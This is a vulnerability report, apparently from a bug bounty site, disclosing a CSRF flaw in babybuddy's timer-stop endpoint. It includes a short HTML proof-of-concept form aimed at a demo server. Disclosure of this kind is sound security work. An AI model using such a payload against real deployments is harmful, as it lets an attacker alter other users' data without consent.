Cross-Site Request Forgery (CSRF) in babybuddy/babybuddy
Valid
Reported on
Jul 30th 2021
✍️ Description
You don't check CSRF token in following endpoint
/timers/1/stop/
with PoC.html
attacker able to stop timer with id equal to 1
.
🕵️♂️ Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.baby-buddy.net/timers/1/stop/">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of stop any timer.
Occurrences
We have contacted a member of the
babybuddy
team and are waiting to hear back
2 years ago
Christopher Charbonneau Wells
has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation